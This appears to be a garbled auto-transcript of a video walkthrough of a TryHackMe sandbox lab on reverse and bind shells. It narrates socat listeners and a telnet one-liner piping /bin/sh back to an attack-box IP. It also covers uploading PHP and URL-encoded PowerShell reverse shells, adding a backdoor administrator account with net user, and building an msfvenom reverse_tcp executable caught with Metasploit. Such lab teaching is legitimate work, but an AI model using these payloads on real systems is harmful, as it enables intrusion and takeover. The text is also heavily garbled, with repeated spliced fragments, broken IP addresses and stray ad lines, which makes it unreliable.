SOCAT session, and we'll go to the SOCAT task 6 to look at the syntax. Right after the reverse shell, is the bind shells syntax. And we'll copy that first command, SOCAT TCP-L, the port exec bash-li. We'll go ahead and paste that in there. And make sure you're using the commands for the Linux system. This is not Windows. So we'll change the port, in this case, to 443, which will enter, and it looks like it did successfully start that SOCAT listener. So now we'll connect back to it from the target, and I know it sounds like a reverse shell because we're connecting back to, but this is actually just, we're connecting to the SOCAT listener. This could have been something that was created days or even weeks in advance to us gaining access to this target system. But because, of course, we're in a sandbox environment, this is all set up to work pretty instantly. So we're able to just create that SOCAT listener and then use the target to type the second command, which is regardless of whether it's Windows or Linux, we will use this command, SOCAT TCP : and it seems to have pasted my last copied item, so we'll get rid of that at the end there with the bash-li, and we will leave the SOCAT TCP : the target IP, not the local IP, it's the target IP, which in this case will be our attack box IP address. That one up at the top there, 10. .10.135 See, I do a space and then make sure the tack is there at the end and press enter. And if we look back on our tack box, it seemed to have aired out, but let's check this out. Do an ls, and you can see we have the files listed in that directory. What directory in? Let's run a pwd, the root desktop. And that command and see different ports. 80 listeners using the netcat command -lvp and then 2 different ports, 8080 and they use 8081. Now our attack box will run that command nc- LVP. You might as well do LVNP, the full options available, and then we'll do port 80. Press enter, open up a another terminal tab, and we'll do the same command, netcat-lvnp, but we'll do a different port, port 8081. Press enter. Now we have 2 netcat listeners, but it's the same attack box using different ports. That prompt appears on the desktop. It's listing on any IP addresses with port 8081. For some reason on the other tab, the prompt didn't appear, but it is also listening, but just on a different port, 8080. If we look back at the payloads, all the things page, we'll see that the victim machine following command is as follows. So the next step is to run this command on the victim machine, the SSH session for that Linux box. So we'll go ahead and copy that, go ahead and clear that out, paste that in, and the command will start right at telnet, and then we'll put in the IP address of the attack box that we will be connecting back to over telnet. That is going to be the one at the very top there. So 10.10.97.99. My IP address did change because I had to restart my attack box, so there's no IP address. And then we have 8080. We do the pipe /bin/sh. You could also do a bash shell by changing the sh to /bin/bash. If you would like to. And then we'll do another pipe. We're piping multiple commands into this one telnet command. Telnet and then your IP. So this is going to be the same IP address. Get rid of those brackets. 10.10.97.99 and 80. So basically we're creating 2 reverse shells in just one command. Pretty cool, right? It's a one line. So we'll get and press enter, and you should see that it is connected. To that IP address, the attack box IP address. And if you look on that listening machine, you'll see, bam, we have a reverse shell through telnet, and we also have a reverse shell on port 8081. So 8080 and 81, boom, 2 birds, 1 stone. So now if we type ls from the shell practice, you'll see it. Pops up on that first port 8080 shell if you do a print working directory. you'll see that it also pops up. As you can see, it works because netcat is installed on both machines, just like socat must be installed on both machines in order for this reverse shell to work. Go ahead and click completed on that, and we can go ahead and cross off that Linux practice box task 14, because that is all the questions for the Linux box. Now, it will not be that easy in real life. This is a sandboxed environment. These things are set up for us. There's really no regulations, no firewalls. All the ports are open, so it's pretty much a piece of cake. Yes, there will be websites that allow you to upload files, but there will certainly be rules in place in order to detect the Linux box, the PHP, paste it into a web browser, and we'll see that it opens up a new vulnerable web page. It looks like we can upload a malicious file. Once that IP address is populated, we'll go ahead and copy it, paste it into a web browser, and we'll see that it opens up a new vulnerable web page. It looks like we can upload a malicious file similar to the Linux box. Now, in the Linux box, the PHP reverse shell is located in the user share web shells PHP directory. Let's go Go ahead and check that on the Windows box to see if it's there. We'll go ahead and do a cd/user/share/web-shells/php. And then press enter. Then do an ls, and we can see that we do have that php-reverse-shell.php. Of course, this file is going to be for the Windows page, or the Windows vulnerable web page. So let's go back to the desktop. We'll do cd, the squiggly line / desktop. Press enter. And then if we do an ls, we'll see that we are successfully transferred to the desktop. And then we'll do a copy to copy that file / user. /share /web shells /php / the name of that file for the PHP reverse shell. It's going to be php-reverse-shell.php. Do a space and then do a dot to indicate we want that file copied to the desktop. Press enter. And now if we check our desktop, we'll see that the file is successfully copied to the desktop. Now we'll go into that file. We'll see that the file is successfully copied to the desktop. Now we'll go into that file. that file copied to the desktop. Press enter, and now if we check our desktop, we'll see that the file is successfully copied to the desktop. Now we'll go into that file, and we will change the IP to our attack box IP, the one at the top right there, 10.10.25.75, and we'll keep the port 123. From our desktop. So we'll click that, click upload and submit, and the file has been successfully submitted. We can do a /uploads, and we'll see in that directory the PHP reverse shell file has been successfully uploaded. So after that file is uploaded, we'll go ahead and activate it to see if it's actually going to create a reverse shell. We'll create a netcat listener by using nc-lvnp and use that same port that was in the file that you changed it to. We'll do 1, 2, 3, 4. Then back on the index, we'll go ahead and click that file within the uploads. So it looks like a shell was not created, so we're going to go ahead and click completed on that, upload a web shell on the Windows target, and try to obtain a reverse shell using PowerShell. So this represents a realistic scenario. You upload a malicious file, it doesn't recognize it when you try to run, and there may be precautions or rule sets in place to reverse-shell.php. It's the same name as the file. I didn't change it. And then after that, we do simply /shell.php. So once we've called out where that file is in the directory, we do a $cmd equals. And remember, whatever we type after the question as you complete them. There's lots of syntax in this lesson, so we're just going to use their example. Are in the upper right hand corner of the clipboard, we'll and paste into a PowerShell reverse. So now we'll use that after the $cmd equals will be executed on the machine. So now we'll use that big the $cmd equals. And remember, whatever we type after the question mark CMD equals will be executed on the machine. So now we'll use that big command that they actually URL encoded, so we don't have to worry about encoding. We'll copy that whole thing, and this will give us a PowerShell reverse shell. Pretty cool, right? So we'll copy that long command, paste it into the clipboard, and they've done all the hard work for us. We just need to change the port and the IP address. So right where the brackets are, in the upper right-hand corner of the clipboard, we'll delete that port and the 2 brackets, and then we'll type in the port of your choice. I'll use port 1234. Is right to the left of that after some percentages and numbers, and we'll take out the brackets as well and type in the IP address of that attack box. So that's going to be at the very top of your attack box right there. There, 10.10.25.75 for me. And once we have that, there's nothing else we need to change, so we'll copy 5.75 for me. And once we have that right there, .10.25.75 for me. And once we have that, there's nothing else we need to change, so we'll copy. And right after the equal sign, we'll go ahead and Control V, CMD equals. We're going to pass that argument to be executed on the machine. So we'll pass that, Control V, paste it in. And before we press enter, because that is going to go to a listener that's not yet set up. So we need to create the listener. Back in the terminal, we'll go ahead and do a nc-lvnp and create a listener on port 1234 or the port of choice that you selected. Press enter. Now that that's listening, we'll go ahead and execute that command through the browser. And now that that's listening, we'll go ahead and execute that command through the browser. And as we can see, if we go to the terminal, the cursor's blinking, so we'll go ahead and type ls. Looks like nothing happened directly. Do a print working directory. So I went back, I checked the PHP reverse shell file, and it seems that there was a small error. I left the P in, so I'm going to take that out, and the IP address is right there. We'll save that, and we will re-upload that to the Windows web server. So we'll actually and the IP address is right there. We'll save that. So I'm going to take the shell file, and it seems that there was a small error. I left the P in, so I'm going to take that out, and the IP address is right left the P in, so I'm going to take the shell file, and it seems that there was a small error. I left the P in, so I'm going to take that out, and the IP address is right there. We'll save that, and we will re-upload that to the Windows web server. So we'll actually rename this file to php-reverse-shell2, because this is the second PHP file that we've done. And then we will go back to the browser and upload the php-reverse-shell2 file, submit that, and if we go to the uploads directory, it should show up alongside the first one that we uploaded, and sure enough, there it is. Let's go ahead and see if it does work if we do have a listener. So we currently have a listener nc-lvmp using port 1234. We'll click it to see if it does execute just by merely clicking it and activating it. It seems that it still was problematic and there was no web shell created. Oh, look at that. So it seems like it did create, but just for a short amount of time, barely any time, and then it just exited because the uname command tried to be run. Let me go ahead and try that again just to make sure, and I'm going to keep my terminal open this time. Keep it like that so we can see it. Press enter, and we can see that for brief milliseconds it was connected, but it was not a stable connection at all. The uname command was not recognized, so it's not saved in the clipboard. So once you have uploaded the correct PHP reverse shell file, go ahead and copy that long command from task 11 web shells, paste it into the clipboard, and we're going to go ahead and change that IP address and port. So this is going to be IP, take out the brackets as well, 10.10.25.75. And the port is going to be 1234, and we're going to copy that command, whole thing, and right after php-reverse-shell2 .php, right after the name of the file, we're going to do a question mark. A question mark cmd equals, and then whatever we put after this is going to be executed by the machine. So we put that in, paste that in, and make sure that you have your listener running. Now we press enter on that command, and it looks like it successfully executed. Once again, it did create a connection, but it was short-lived for some reason. Now to confirm this, I actually went ahead and shut off the attack box, I shut off the machine, and I actually shut down everything. I followed the steps in TryHackME, and sure enough, the same thing happened. It was a brief shell that did connect, so we can confirm that there was a reverse shell that was using PowerShell through this web server. So we'll go ahead and click completed on that. We certainly got our practice in. Now let's move to the next question. Once again, don't get hung up if something doesn't go exactly right. This is just a practice session, so feel free to learn and run these however you want. So do not feel bad if it doesn't go perfectly. Remember, this is TryHackME. There's all sorts of and copy it from and log in to this machine. Go ahead and copy that command into the clipboard. We'll copy it from the clipboard and paste that into the terminal and press ahead and log in to this machine. Go ahead and copy that command into the clipboard. We'll copy it from the clipboard and paste that into the terminal and press enter. We'll type Y for yes. This will log us into that Windows 2019 server box. If you hover to the right, you can see that we can still access the terminal from which we can run commands, Windows PowerShell commands. So we'll actually go to task 12, next steps, and they show us the syntax for creating users with administrator privileges. So we have the syntax net user, the username. We'll type in BHS as the username and the password. Will be BHS, the username will tell us with administrator privileges. So we have the syntax net user, the username. We'll type in BHS as the user. Name and the password will be BHS space /add and then press enter. We'll now do this second command, net local group administrators the username /add. So we'll do net local group administrator. BHS, the account we just created, and then /add. Press enter, and they have successfully been added to the administrators list. To check that this was done correctly, let's go ahead and open up a new terminal from our tac box from TryHackME. Then we'll paste that same command for RDP, but we're going to change the username to the user that we just created. It's going to be u:(BHS) for me. Yours is going to be different. And then the password is going to be in single quotes. going to change that to BHS and press enter. If it connects successfully, then it looks like the user was created. It looks like the credentials failed. So it seems that it was not successful. Let's go back to the Windows desktop with the actual free RDP. If you use Control and 2 fingers to zoom out, you can see that we have the taskbar there. It's just a little hidden. And you can click that Start button, or you can click the magnifying glass, and we will search for command prompt. Or just type in CMD and press enter, and as you can see, we are here at the command prompt. So we should be able to use these net user and net local group commands from the command prompt. So we'll go ahead and use the first one, net user, the username BHS, password BHS /add, press enter. Command completed successfully. That's a better sign than what we received in that RDP desktop terminal from the attack box. And what happened was when that command completed successfully, it created that RDP session with the Windows box. Any commands that we put after that are not going to be read because it's focusing now on that RDP session. So we can minimize those, and we will add that new user to the administrators group. How do we do that? We do net local group administrators, which is the name of the group, space the username, and then /add. Press enter. Command completed successfully. Nice job, guys. Now we can go back to the terminal, and we're going to try that command again from the task 15 with the username of the user we created and the password of the password that we set. Press enter, and it looks like it successfully completed because we that is not being used to connect to the RDP session. Then we'll create a listener using TCP. So we'll being used to connect to the RDP session. Then we'll create a listener using TCP. So we'll do that command, socat TCP. E dash L colon, and then the port, we'll do port 1234 space tac. Press enter. So now that that's listening, we'll switch it back over to the Windows machine and we'll pull up that command prompt again. And now we will use this command to connect it back to that listening session. We'll do SOCAT TCP colon the local IP address. That's going to be the IP address that we used from the attack box. To start that listener, so it's going to be the one up there, 10.10.90.2. In other words, not this Windows machine IP address. And then we'll do a colon the port, so we set that to 1234. Yours may be different. Make sure you're putting the port that you chose. And then we do a space exec colon PowerShell.exe, comma, pipes, and press enter. SOCAT is not used within command prompt. It's not installed, so this isn't going to work. Now, in theory, this would work if SOCAT or Netcat was installed on this Windows system. Another route that could be taken is the one that was used in task 11 to URL encode an argument to be taken is the one that or net installed, so this isn't going to work. SOCAT is not C, comma, pipes. And press enter. SOCAT is not used within command prompt. It's not installed, so this isn't going to work. Now, in theory, this would work if SOCAT or netcat was installed on this Windows system. Another route that could be taken is the one that was used in task 11 to URL encode an argument that will then be executed by the Windows server. That was this long command here. All we would need to do is take that SOCAT or netcat command, URL encode it, and right after the $CMD equals, put that command executed by the Windows server. Alternatively, if the reverse shell that we created using PowerShell had remained open, we can also run that command through there. But as we know, that session didn't last long. So let's go ahead and try netcat. So we'll do netcat-lvnp and we'll use port 1234.
Learn from world-class Udemy instructors like Chris.
Excel is a magician's hat that pulls out solutions to problems.
Now if we go back to the payload, port 1234. Now if we go back to the payload all the things page, you'll remember that they actually 234 cat, as we know, that session didn't last long. So let's go ahead and try netcat. So we'll do netcat-lvnp and we'll use port 1234. Now if we go back to the payload all the things page, you'll remember that they actually have a section specifically for netcat, and not only netcat, but they have a section for PowerShell, which we can use on this Windows system. So we'll go ahead and copy this first one. It looks like we have on this Windows system. So netcat, but they have a section for PowerShell, which we can use on this Windows system. So we'll go ahead and copy this first one. It looks like we have to change the IP address and port, and they have a little area for that. So we'll go ahead and change this IP address to the IP address that we'll connect to, which is the attack box. IP address up there. So that'll be 10.10.90.2, and then the port is going to be 1234, and let's try this with the quotations. I don't know if those will be needed, but we'll just go ahead and try it with it. Then in PowerShell, we'll paste that in, and it looks like that PowerShell command was unsuccessful, but you get the point that you can use the payloads, all the things repository to look for different exploits that you may actually be able to use. Okay, the next question is create a 64-bit Windows interpreter shell using MSF Venom and upload it to the Windows target. Activate the shell and catch it with the multi-handler. Experiment with the features of this shell. Okay, let's check out the MSF Venom task, which has examples, and we can see the full command right there, MSF Venom -p Windows, where the reverse_TCP file is located, what type of file it's going to be, the listening host and listening port. So let's just use that command. Make sure your attack box is started if it's not started yet. And once that attack box is started, go ahead and click the green Start Machine button for the Windows practice box. So if you still have that RDP session from the previous question, you can go ahead and close out of that. And in the terminal of the Windows practice box, we'll go ahead and type MSF Venom. And the rest of this command right here to generate a Windows x64 reverse shell in an exe format.
Big dreams start small. At GoDaddy, we help you take that first step
That we can upload to the target. So the full command is going to be MSF Venom -p for payload. Then where's the payload located? They tell us right there it's located located in the Windows /x64/shell directory. So we'll go ahead and do Windows /x64/shell/ the name of the file, which is reverse_TCP. It's going to be a file with the exe format. It's going to be an executable, then -o, the output file location, and that's just going to be in the current directory, and we will name it shell.exe. The L host is going to be equal to RIP. Do 1, 2, 3, 4, and press enter. Aha, and it might take a minute or two, but that Windows x64 reverse shell file executable has been created with a file size of 7,168 bytes. We'll do a quick PWD to see where that file was located, and it was located in the /root directory. So if we click on the root's home, we'll see it right there. The file will be saved by directory. So if we click on the root's home, we'll see it right there. The file will be saved by default in whatever directory you are currently in when you created that file. So this one's right in the root home, and you can see it right there. So now we need to upload it to that vulnerable Windows web server. So pull up the browser, and we'll type in that HTTP. So we can type in that IP address that was populated for the Windows shell. It's going to be right over there in the top left-hand corner. We'll do http://10.10.188.10. Yours is going to be different. Press enter, and you'll see we have hit that file uploads page. We'll browse. So hit the browse button and we'll go to home and we'll see that shell.exe. This is the root's home directory and we can click open and submit. All right, file successfully uploaded. So we've created the MSF Venom Windows x64 reverse shell file executable. We uploaded that to the Windows vulnerable web shell. Now, how are we going to actually create that connection? Well, we need a listener for that executable to connect back to once we activate it. So you can activate it now, but it's not going to do anything. So on our attack box, we need to go back to the terminal and type MSF console. This will start MSF console from which we can run the interpreter session through Metasploit. So the first step was creating that executable file, uploading it. Now the second step is going to be using the multi-handler within Meterpreter. So we type in use multi/handler and press enter. And it looks like it gave us the generic shell underscore reverse underscore TCP. That's the exact same shell that we're going to be using for this type of attack, a TCP reverse shell. So we're going to go ahead and do a show options to see if there's anything that we need to set. Looks like the L host and the L port need to be set, and there's not really many other options besides that. So we'll set the L host to the attack box IP address. So let's going to be 10.10.28, the same IP address that we set that executable file to connect back to. So that's going to be our attack box. We'll set the paste it into the clipboard, and they've done all the hard work for .php PowerShell command. Desktop, putting the port that you but you get the point that you can use one right there at the top. Then we have an L port, and the L port we'll do 1, 2, 3, 4, and press enter. Aha, and it might take a minute or two, but that Windows x64 reverse shell file executable has been created with home. So now we left hand page will browse home created will actually connect back to our attack box, start MSF console from which we can run the. That's the example. Looks like the L host will be 10.10.28, the same IP address that we set that. Executable file to connect back to. So that's going to be our attack box. We'll set the L port. You could also do set G if you wanted to set it globally. And we'll set that L port to the same port that we specified in the executable file for Windows Reverse Shell, which is 1, 2, 3, 4. Now that that's been set, we'll go ahead and run that. So if we try to activate that shell on the vulnerable web server, you'll see, okay, which is 1, 2, 3, 4. Now that that's been set, we'll go ahead and run that. So if we try to activate that shell on the vulnerable web server, you'll see, okay, it downloads the shell.exe file. If we click that, double click it, if we try to activate that shell on the vulnerable web server, you'll see, okay, it downloads the shell.exe file. If we click that, double click it, try to run it, we'll go back to the terminal, and you can see that the reverse shell has actually started. Now, you could alternatively have gone actually to that Windows VM. So if we wanted to, you could open up another terminal, and let's go ahead and background this shell. We can use the background command, and if we go to the task 15 Windows practice box, it has that command in there to actually